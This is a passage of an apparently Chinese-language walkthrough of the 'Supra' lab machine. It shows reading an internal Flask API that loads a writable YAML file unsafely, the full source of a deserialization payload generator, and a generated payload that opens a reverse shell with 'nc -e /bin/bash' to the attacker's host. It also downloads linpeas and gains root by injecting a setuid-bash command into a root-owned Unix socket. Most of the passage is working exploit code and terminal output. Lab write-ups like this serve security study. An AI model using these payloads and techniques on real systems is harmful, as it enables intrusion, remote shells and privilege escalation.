65536 qdisc noqueue state UNKNOWN group default qlen 1000\n link\/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n inet 127.0.0.1\/8 scope host lo\n valid_lft forever preferred_lft forever\n inet6 ::1\/128 scope host \n valid_lft forever preferred_lft forever\n2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000\n link\/ether 08:00:27:f5:94:be brd ff:ff:ff:ff:ff:ff\n inet 192.168.10.103\/24 brd 192.168.10.255 scope global dynamic enp0s3\n valid_lft 6066sec preferred_lft 6066sec\n inet6 fd00:4c10:d50a:f900:a00:27ff:fef5:94be\/64 scope global dynamic mngtmpaddr \n valid_lft 86257sec preferred_lft 14257sec\n inet6 fe80::a00:27ff:fef5:94be\/64 scope link \n valid_lft forever preferred_lft forever\n(remote) www-data@Supra:\/home\/it404$ cd \/\n(remote) www-data@Supra:\/$ ls -la\ntotal 68\ndrwxr-xr-x 18 root root 4096 Oct 6 2021 .\ndrwxr-xr-x 18 root root 4096 Oct 6 2021 ..\nlrwxrwxrwx 1 root root 7 Oct 6 2021 bin -> usr\/bin\ndrwxr-xr-x 3 root root 4096 Oct 6 2021 boot\ndrwxr-xr-x 17 root root 3140 Aug 9 02:07 dev\ndrwxr-xr-x 86 root root 4096 Aug 9 02:07 etc\ndrwxr-xr-x 3 root root 4096 Oct 6 2021 home\nlrwxrwxrwx 1 root root 30 Oct 6 2021 initrd.img -> boot\/initrd.img-5.10.0-8-amd64\nlrwxrwxrwx 1 root root 30 Oct 6 2021 initrd.img.old -> boot\/initrd.img-5.10.0-8-amd64\nlrwxrwxrwx 1 root root 7 Oct 6 2021 lib -> usr\/lib\nlrwxrwxrwx 1 root root 9 Oct 6 2021 lib32 -> usr\/lib32\nlrwxrwxrwx 1 root root 9 Oct 6 2021 lib64 -> usr\/lib64\nlrwxrwxrwx 1 root root 10 Oct 6 2021 libx32 -> usr\/libx32\ndrwx------ 2 root root 16384 Oct 6 2021 lost+found\ndrwxr-xr-x 3 root root 4096 Oct 6 2021 media\ndrwxr-xr-x 2 root root 4096 Oct 6 2021 mnt\ndrwxr-xr-x 3 root root 4096 Oct 11 2021 opt\ndr-xr-xr-x 149 root root 0 Aug 9 01:38 proc\ndrwx------ 6 root root 4096 Oct 12 2021 root\ndrwxr-xr-x 18 root root 520 Aug 9 02:07 run\nlrwxrwxrwx 1 root root 8 Oct 6 2021 sbin -> usr\/sbin\ndrwxr-xr-x 2 root root 4096 Oct 6 2021 srv\ndr-xr-xr-x 13 root root 0 Aug 9 01:38 sys\ndrwxrwxrwt 10 root root 4096 Aug 9 02:14 tmp\ndrwxr-xr-x 14 root root 4096 Oct 6 2021 usr\ndrwxr-xr-x 12 root root 4096 Oct 6 2021 var\nlrwxrwxrwx 1 root root 27 Oct 6 2021 vmlinuz -> boot\/vmlinuz-5.10.0-8-amd64\nlrwxrwxrwx 1 root root 27 Oct 6 2021 vmlinuz.old -> boot\/vmlinuz-5.10.0-8-amd64\n(remote) www-data@Supra:\/$ cd opt\n(remote) www-data@Supra:\/opt$ ls -la\ntotal 12\ndrwxr-xr-x 3 root root 4096 Oct 11 2021 .\ndrwxr-xr-x 18 root root 4096 Oct 6 2021 ..\ndrwxr-xr-x 2 root root 4096 Oct 12 2021 api\n(remote) www-data@Supra:\/opt$ cd api\/\n(remote) www-data@Supra:\/opt\/api$ ls -la\ntotal 20\ndrwxr-xr-x 2 root root 4096 Oct 12 2021 .\ndrwxr-xr-x 3 root root 4096 Oct 11 2021 ..\n-rwxrwxrwx 1 www-data www-data 445 Oct 11 2021 accounts.yaml\n-rw-r--r-- 1 root root 609 Oct 12 2021 internal-api.py\n-rwxr-xr-x 1 root root 36 Oct 11 2021 start-internal.sh\n(remote) www-data@Supra:\/opt\/api$ cat start-internal.sh \n#!\/bin\/bash\npython3 internal-api.py\n(remote) www-data@Supra:\/opt\/api$ cat accounts.yaml \nemails:\n\n - Gloriawrong@zonnetd.nl\n - cheerfulMark93@atbt.net\n - horribleMicheal30@aliceaedsl.fr\n - Tamaradull@aiam.com\n - Grantitchy@lieve.ca\n - easyAngelica60@heatnet.nl\n - Rebekaheasy@lieve.com\n - zealousKatelyn@ggmail.com\n - depressedBridget62@yahooi.com.ar\n - fierceBrooke@optoniline.net\n\npasswords:\n\n - 6NpjqVCM\n - mzPdgc9V\n - fpRze8bn\n - x4Lm3W6M\n - tYUBN6Qx\n - 8zNBxXcd\n - X48UYKrw\n - xEfjB39C\n - Wk956r4a\n - UKQC5q2a(remote) www-data@Supra:\/opt\/api$ cat internal-api.py \nfrom flask import Flask, request\n#import yaml\nimport ruamel.yaml\nimport warnings\nfrom base64 import b64decode\n\nwarnings.simplefilter('ignore', ruamel.yaml.error.UnsafeLoaderWarning)\n\nfrom yaml.loader import FullLoader\napp = Flask(__name__)\n\n@app.route("\/", methods=["GET"])\ndef index():\n return "Supra Internals"\n\n@app.route("\/read-leaked-accounts", methods=["GET"])\ndef read():\n with open(r'.\/accounts.yaml') as file:\n #accounts = yaml.load(file, Loader=FullLoader)\n accounts = ruamel.yaml.load(file)\n return accounts\n\nif __name__ == '__main__':\n app.run("127.0.0.1", port=8081)<\/code><\/pre>\n\u627e\u5230\u4e86\u4ee3\u7801\uff0c\u4e14accounts.yaml<\/code>\u53ef\u5199\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\u6709\u6ca1\u6709\u529e\u6cd5\u52ab\u6301\u914d\u7f6e\u6587\u4ef6\u641e\u70b9\u4e8b\u60c5\u3002<\/p>\n<\/div><\/p>\nhttps:\/\/book.hacktricks.xyz\/pentesting-web\/deserialization\/python-yaml-deserialization<\/a><\/p>\n\u5c1d\u8bd5\u770b\u4e00\u4e0b\u662f\u5426\u53ef\u4ee5\u641e\u4e8b\u60c5\uff1a<\/p>\n
import yaml\nfrom yaml import UnsafeLoader, FullLoader, Loader\nimport subprocess\n\nclass Payload(object):\n def __reduce__(self):\n return (subprocess.Popen,('ls',))\n\ndeserialized_data = yaml.dump(Payload()) # serializing data\nprint(deserialized_data)\n\n#!!python\/object\/apply:subprocess.Popen\n#- ls\n\nprint(yaml.load(deserialized_data, Loader=UnsafeLoader))\nprint(yaml.load(deserialized_data, Loader=Loader))\nprint(yaml.unsafe_load(deserialized_data))\n\n# python3 exp.py\n# !!python\/object\/apply:subprocess.Popen\n# - ls\n\n# <Popen: returncode: None args: 'ls'>\n# exp.py exp.sh result.txt\n# exp.py exp.sh result.txt\n# <Popen: returncode: None args: 'ls'>\n# <Popen: returncode: None args: 'ls'>\n# exp.py exp.sh result.txt<\/code><\/pre>\n\u4f46\u662f\u6267\u884c\u6548\u679c\u4e0d\u597d\uff0c\u53ef\u80fd\u4f7f\u7528\u9519\u4e86\uff0c\u5c1d\u8bd5\u4e00\u4e0b\u522b\u4eba\u5199\u7684\u811a\u672c\uff1ahttps:\/\/github.com\/j0lt-github\/python-deserialization-attack-payload-generator<\/a><\/p>\n# Python Deserialization attack payload file generator for pickle ,pyYAML, ruamel.yaml and jsonpickle module by j0lt\n# Requirements : Python 3.x , modules jsonpickle, pyyaml\n# Version : 2.3\n# Usage : python peas.py\n\nimport pickle\nfrom base64 import b64encode, b64decode\nimport jsonpickle\nimport yaml\nimport subprocess\nfrom copy import deepcopy\n\nclass Gen(object):\n def __init__(self, payload):\n self.payload = payload\n\n def __reduce__(self):\n return subprocess.Popen, (self.payload,)\n\nclass Payload(object):\n\n def __init__(self, c, location, base, os):\n self.location = location\n self.base = base\n self.os = os\n self.prefix = '' if self.os == 'linux' else "cmd.exe \/c "\n self.cmd = self.prefix+c\n self.payload = b''\n self.quotes = True if "\\'" in self.cmd or "\\"" in self.cmd else False\n\n def pick(self):\n self.payload = pickle.dumps(Gen(tuple(self.case().split(" "))))\n self.payload = self.verifyencoding()\n self.savingfile("_pick")\n\n def ya(self):\n if self.quotes:\n self.payload = b64decode("ISFweXRob24vb2JqZWN0L2FwcGx5OnN1YnByb2Nlc3MuUG9wZW4KLSAhIXB5dGhvbi90dXBsZQogIC0g"\n "cHl0aG9uCiAgLSAtYwogIC0gIl9faW1wb3J0X18oJ29zJykuc3lzdGVtKHN0cihfX2ltcG9ydF9fKCdiY"\n "XNlNjQnKS5iNjRkZWNvZGUoJw==") + b64encode(bytes(self.cmd, 'utf-8')) + \\\n b64decode("JykuZGVjb2RlKCkpKSI=")\n else:\n self.payload = bytes(yaml.dump(Gen(tuple(self.cmd.split(" ")))), 'utf-8')\n self.payload = self.verifyencoding()\n self.savingfile("_yaml")\n\n def js(self):\n self.payload = bytes(jsonpickle.encode(Gen(tuple(self.case().split(" ")))),\n 'utf-8')\n self.payload = self.verifyencoding()\n self.savingfile("_jspick")\n\n def __add__(self, other):\n return self + other\n\n def verifyencoding(self):\n return b64encode(self.payload) if self.base else self.payload\n\n def savingfile(self, suffix):\n open(self.location.__add__(suffix), "wb").write(self.payload)\n\n def chr_encode(self, data):\n d = '+'.join(['chr('+str(ord(ii))+')' for ii in data])\n return d\n\n def case(self):\n cmd = deepcopy(self.cmd)\n if self.quotes:\n cmd = self.prefix+"python -c exec({})".format(self.chr_encode("__import__('os').system"\n "(__import__('base64').b64decode({})"\n ".decode('utf-8'))".\n format(b64encode(bytes(self.cmd, 'utf-8')\n ))))\n return cmd \n\nif __name__ == "__main__":\n cmd = input("Enter RCE command :")\n o = 'linux' if input("Enter operating system of target [linux\/windows] . Default is linux :").lower() != "windows" \\\n else 'windows'\n b = True if input("Want to base64 encode payload ? [N\/y] :").lower() == "y" else False\n p = Payload(cmd, input("Enter File location and name to save :"), b, o)\n funtiondict = {"pickle": p.pick, "pyyaml": p.ya, "ruamel.yaml": p.ya, "jsonpickle": p.js}\n while 1:\n module = input("Select Module (Pickle, PyYAML, jsonpickle, ruamel.yaml, All) :").lower()\n if module in funtiondict.keys():\n funtiondict[module]()\n break\n elif module == "all":\n for i in funtiondict.keys():\n funtiondict[i]()\n break\n else:\n print("Wrong Input ")\n continue\n print("Done Saving file !!!!")<\/code><\/pre>\n\u5148\u5b89\u88c5\u4e00\u4e0b\u914d\u7f6e\u7684\u5e93\uff1a<\/p>\n
# requirements.txt\njsonpickle==1.2\nPyYAML==5.1.2<\/code><\/pre>\n\u7136\u540e\u751f\u6210\u8f7d\u8377;<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ python3 peas.py \nEnter RCE command :nc -e \/bin\/bash 192.168.10.104 2345\nEnter operating system of target [linux\/windows] . Default is linux :\nWant to base64 encode payload ? [N\/y] :N\nEnter File location and name to save :.\/badcode\nSelect Module (Pickle, PyYAML, jsonpickle, ruamel.yaml, All) :ruamel.yaml\nDone Saving file !!!!\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ ls -la\ntotal 604\ndrwxr-xr-x 2 kali kali 4096 Aug 9 02:53 .\ndrwxr-xr-x 121 kali kali 4096 Aug 9 01:06 ..\n-rw-r--r-- 1 kali kali 114 Aug 9 02:53 badcode_yaml\n-rw-r--r-- 1 kali kali 457 Aug 9 02:43 exp.py\n-rwxr-xr-x 1 kali kali 396 Aug 9 01:12 exp.sh\n-rwxr-xr-x 1 kali kali 3806 Aug 9 02:50 peas.py\n-rw-r--r-- 1 kali kali 593134 Aug 9 01:22 result.txt\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Supra]\n\u2514\u2500$ cat badcode_yaml \n!!python\/object\/apply:subprocess.Popen\n- !!python\/tuple\n - nc\n - -e\n - \/bin\/bash\n - 192.168.10.104\n - '2345'<\/code><\/pre>\n\u5148\u8fdb\u884c\u7aef\u53e3\u8f6c\u53d1\uff0c\u4f7f\u5916\u8fb9\u53ef\u4ee5\u8bbf\u95ee\uff1a<\/p>\n
(remote) www-data@Supra:\/opt\/api$ socat TCP-LISTEN:8082,fork TCP:127.0.0.1:8081 &\n[1] 1157<\/code><\/pre>\n\u7136\u540e\u5c1d\u8bd5\u5bfc\u5165\u8fdb\u884c\u8bbf\u95ee\uff1a<\/p>\n
# http:\/\/192.168.10.103:8082\/read-leaked-accounts\nInternal Server Error\nThe server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.<\/code><\/pre>\n<\/div><\/p>\nsocket.s\u63d0\u6743root<\/h3>\n
\u5c1d\u8bd5\u4e0a\u4f20linpeas.sh<\/code>\u8fdb\u884c\u63a2\u6d4b\uff1a<\/p>\n(remote) it404@Supra:\/tmp$ wget http:\/\/192.168.10.104:8888\/linpeas.sh\n(remote) it404@Supra:\/tmp$ chmod +x linpeas.sh\n(remote) it404@Supra:\/tmp$ .\/linpeas.sh<\/code><\/pre>\n\u53d1\u73b0\u4e86\uff1a<\/p>\n
\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 SGID\n\u255a https:\/\/book.hacktricks.xyz\/linux-hardening\/privilege-escalation#sudo-and-suid\n-rwxr-sr-x 1 root shadow 38K Jul 9 2021 \/usr\/sbin\/unix_chkpwd\n-rwxr-sr-x 1 root mail 23K Feb 4 2021 \/usr\/bin\/dotlockfile\n-rwxr-sr-x 1 root crontab 43K Feb 22 2021 \/usr\/bin\/crontab\n-rwxr-sr-x 1 root tty 35K Jul 28 2021 \/usr\/bin\/wall\n-rwxr-sr-x 1 root root 15K Nov 19 2020 \/usr\/bin\/dotlock.mailutils\n-rwxr-sr-x 1 root shadow 31K Feb 7 2020 \/usr\/bin\/expiry\n-rwxr-sr-x 1 root tty 23K Jul 28 2021 \/usr\/bin\/write.ul (Unknown SGID binary)\n-rwxr-sr-x 1 root shadow 79K Feb 7 2020 \/usr\/bin\/chage\n-rwxr-sr-x 1 root ssh 347K Mar 13 2021 \/usr\/bin\/ssh-agent\n\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Files with ACLs (limited to 50)\n\u255a https:\/\/book.hacktricks.xyz\/linux-hardening\/privilege-escalation#acls\n# file: \/home\/\/it404\/local.txt\nUSER root rw- \nuser it404 r-- \nGROUP root --- \nmask r-- \nother --- \n\n# file: \/usr\/local\/src\/socket.s\nUSER root rwx \nuser it404 rwx \nGROUP root r-x \nmask rwx \nother r-x<\/code><\/pre>\n\u53d1\u73b0\u5b58\u5728socket\u7684suid\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\u662f\u5426\u53ef\u4ee5\u8fdb\u884c\u63d0\u6743\uff1a<\/p>\n
<\/div><\/p>\n\u8fdb\u884c\u63d0\u6743\uff1ahttps:\/\/book.hacktricks.xyz\/linux-hardening\/privilege-escalation\/socket-command-injection<\/a><\/p>\n(remote) it404@Supra:\/tmp$ netstat -a -p --unix | grep socket\n(Not all processes could be identified, non-owned process info\n will not be shown, you would have to be root to see it all.)\nActive UNIX domain sockets (servers and established)\nunix 2 [ ACC ] STREAM LISTENING 11938 - \/usr\/local\/src\/socket.s\nunix 6 [ ] DGRAM 10633 - \/run\/systemd\/journal\/socket\nunix 2 [ ACC ] STREAM LISTENING 11417 - \/run\/dbus\/system_bus_socket\nunix 3 [ ] STREAM CONNECTED 11668 - \/run\/dbus\/system_bus_socket\nunix 3 [ ] STREAM CONNECTED 11651 - \/run\/dbus\/system_bus_socket\nunix 3 [ ] STREAM CONNECTED 11652 - \/run\/dbus\/system_bus_socket\nunix 3 [ ] STREAM CONNECTED 11653 - \/run\/dbus\/system_bus_socket\n(remote) it404@Supra:\/tmp$ echo "cp \/bin\/bash \/tmp\/bash; chmod +s \/tmp\/bash; chmod +x \/tmp\/bash;" | socat - UNIX-CLIENT:\/usr\/local\/src\/socket.s\n(remote) it404@Supra:\/tmp$ ls -la \/bin\/bash\n-rwxr-xr-x 1 root root 1234376 Aug 4 2021 \/bin\/bash\n(remote) it404@Supra:\/tmp$ ls -la \/tmp\/bash\n-rwsr-sr-x 1 root root 1234376 Aug 9 03:36 \/tmp\/bash\n(remote) it404@Supra:\/tmp$ \/tmp\/bash -p\n(remote) root@Supra:\/tmp# cd ~\n(remote) root@Supra:\/home\/it404# cd \/root\n(remote) root@Supra:\/root# ls -la\ntotal 40\ndrwx------ 6 root root 4096 Oct 12 2021 .\ndrwxr-xr-x 18 root root 4096 Oct 6 2021 ..\n-rw------- 1 root root 475 Oct 12 2021 .bash_history\n-rw-r--r-- 1 root root 571 Apr 10 2021 .bashrc\ndrwxr-xr-x 3 root root 4096 Oct 11 2021 .cache\ndrwxr-xr-x 3 root root 4096 Oct 10 2021 .local\ndrwxr-xr-x 3 root root 4096 Oct 6 2021 .npm\n-rw-r--r-- 1 root root 161 Jul 9 2019 .profile\n-rw------- 1 root root 32 Oct 12 2021 proof.txt\ndrwxr-xr-x 2 root root 4096 Oct 12 2021 .s\n(remote) root@Supra:\/root# cd .s\n(remote) root@Supra:\/root\/.s# ls -la\ntotal 16\ndrwxr-xr-x 2 root root 4096 Oct 12 2021 .\ndrwx------ 6 root root 4096 Oct 12 2021 ..\n-rw-r--r-- 1 root root 495 Oct 12 2021 socket-root.py\n-rw-r--r-- 1 root root 35 Oct 12 2021 starts.sh\n(remote) root@Supra:\/root\/.s# cat socket-root.py \nimport socket\nimport os, os.path\nimport time\nfrom collections import deque \n\nif os.path.exists("\/usr\/local\/src\/socket.s"):\n os.remove("\/usr\/local\/src\/socket.s") \n\nserver = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\nserver.bind("\/usr\/local\/src\/socket.s")\nos.system("setfacl -m u:it404:rwx \/usr\/local\/src\/socket.s")\nwhile True:\n server.listen(1)\n conn, addr = server.accept()\n datagram = conn.recv(1024)\n if datagram:\n print(datagram)\n os.system(datagram)\n conn.close()\n(remote) root@Supra:\/root\/.s# cat starts.sh \n#!\/bin\/bash\npython3 socket-root.py<\/code><\/pre>\n\u62ff\u5230root\uff01<\/p>\n
\u989d\u5916\u6536\u83b7<\/h2>\n\u63a2\u6d4bfacl\u6587\u4ef6\u7684\u65b9\u6cd5<\/h3>\ngetfacl -t -s -R -p \/bin \/etc \/home \/opt \/root \/sbin \/usr \/tmp 2>\/dev\/null\n\n# file: \/home\/it404\/local.txt\nUSER root rw- \nuser it404 r-- \nGROUP root --- \nmask r-- \nother --- \n\n# file: \/usr\/local\/src\/socket.s\nUSER root rwx \nuser it404 rwx \nGROUP root r-x \nmask rwx \nother r-x<\/code><\/pre>\n\u53c2\u8003<\/h2>\n
https:\/\/www.bilibili.com\/video\/BV18t421w72D\/<\/a><\/p>\n
![\"image-20240809120951463\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408091537902.png\")
<\/div>![\"image-20240809121004995\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408091537903.png\")
<\/div><\/p>\n![\"image-20240809121333129\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408091537904.png\")
<\/div><\/p>\n![\"image-20240809141839528\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408091537905.png\")
<\/div><\/p>\n![\"image-20240809143213416\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408091537906.png\")
<\/div><\/p>\n![\"image-20240809150620845\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408091537907.png\")
<\/div><\/p>\n![\"image-20240809153515978\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408091537908.png\")
<\/div><\/p>\n